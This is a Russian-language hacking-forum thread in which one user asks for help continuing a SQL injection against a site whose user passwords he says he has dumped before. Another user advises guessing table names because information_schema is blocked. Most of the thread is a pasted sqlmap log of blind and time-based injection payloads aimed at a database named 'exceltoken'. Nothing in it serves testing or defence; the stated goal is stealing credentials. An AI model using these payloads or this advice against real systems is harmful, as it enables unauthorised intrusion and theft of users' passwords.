
Просмотр полной версии : помогите с инъекцией


slipknot13
14.10.2017, 16:10
раньше таблицы дампил, а сейчас не могу

http://rgho.st/7DGXQ4dcm/image.png (http://rgho.st/7DGXQ4dcm.view)

http://rgho.st/7DGXQ4dcm

erwerr2321
14.10.2017, 16:20
slipknot13 said:
↑ (https://antichat.live/posts/4138498/)
раньше таблицы дампил, а сейчас не могу


почему?

slipknot13
14.10.2017, 17:22
мне кажется, что админ поставил какую-то защиту: раньше можно было сдампить пароли пользователей, а сейчас нет. Когда пробую на сайте вручную, получаю Unauthorized Access

erwerr2321
14.10.2017, 17:27
ну, а information_schema раньше была?

slipknot13
14.10.2017, 17:46
да

erwerr2321
14.10.2017, 17:54
ну вот... а теперь её нет.

т.е. тебе сначала нужно подобрать тэйбл нэймы, а потом уже колумн нэймы нужной тебе таблицы.

slipknot13
14.10.2017, 19:10
я вроде как знаю названия таблиц, но sqlmap их не находит

slipknot13
14.10.2017, 19:42
может, расскажешь, как подобрать тейбл неймы?

slipknot13
14.10.2017, 21:55
лог sqlmap

[19:41:45] [PAYLOAD] 14 AND ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS

CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x657863656c746f

6b656e),1,1))>66

[19:41:45] [PAYLOAD] 14 AND ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS

CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x657863656c746f

6b656e),1,1))>52

[19:41:46] [PAYLOAD] 14 AND ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS

CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x657863656c746f

6b656e),1,1))>48

[19:41:46] [PAYLOAD] 14 AND ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS

CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x657863656c746f

6b656e),1,1))>1

[19:41:47] [INFO] retrieved:

[19:41:47] [DEBUG] performed 4 queries in 1.62 seconds

[19:41:47] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>66),SLEEP(10),9830)

[19:41:47] [WARNING] (case) time-based comparison requires larger statistical mo

[19:41:47] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>170454),SLEEP(10),9830)

.

[19:41:47] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>819325),SLEEP(10),9830)

.

[19:41:47] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>261031),SLEEP(10),9830)

.

[19:41:48] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>164592),SLEEP(10),9830)

.

[19:41:48] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>160487),SLEEP(10),9830)

.

[19:41:49] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>871054),SLEEP(10),9830)

.

[19:41:50] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>913561),SLEEP(10),9830)

.

[19:41:50] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>478526),SLEEP(10),9830)

.

[19:41:51] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>192387),SLEEP(10),9830)

.

[19:41:51] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>330357),SLEEP(10),9830)

.

[19:41:52] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>385436),SLEEP(10),9830)

.

[19:41:52] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>145149),SLEEP(10),9830)

.

[19:41:53] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>823404),SLEEP(10),9830)

.

[19:41:53] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>142557),SLEEP(10),9830)

.

[19:41:54] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>848401),SLEEP(10),9830)

.

[19:41:54] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>487756),SLEEP(10),9830)

.

[19:41:55] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>840171),SLEEP(10),9830)

.

[19:41:55] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>800333),SLEEP(10),9830)

.

[19:41:56] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>899978),SLEEP(10),9830)

.

[19:41:56] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>502795),SLEEP(10),9830)

.

[19:41:57] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>128986),SLEEP(10),9830)

.

[19:41:57] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>227072),SLEEP(10),9830)

.

[19:41:57] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>648363),SLEEP(10),9830)

.

[19:41:58] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>656500),SLEEP(10),9830)

.

[19:41:58] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>280401),SLEEP(10),9830)

.

[19:41:59] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>721896),SLEEP(10),9830)

.

[19:41:59] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>769715),SLEEP(10),9830)

.

[19:41:59] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>689458),SLEEP(10),9830)

.

[19:42:00] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>747115),SLEEP(10),9830)

.

[19:42:00] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>103578),SLEEP(10),9830)

. (done)

[19:42:01] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>52),SLEEP(10),9830)

[19:42:01] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>48),SLEEP(10),9830)

[19:42:02] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>1),SLEEP(10),9830)

[19:42:02] [INFO] retrieved:

[19:42:02] [DEBUG] performed 4 queries in 15.59 seconds

[19:42:02] [WARNING] unable to retrieve the number of tables for database 'exceltoken'

[19:42:02] [ERROR] unable to retrieve the table names for any database

do you want to use common table existence check? [y/N/q] n

[19:42:09] [CRITICAL] unable to retrieve the tables in database 'exceltoken'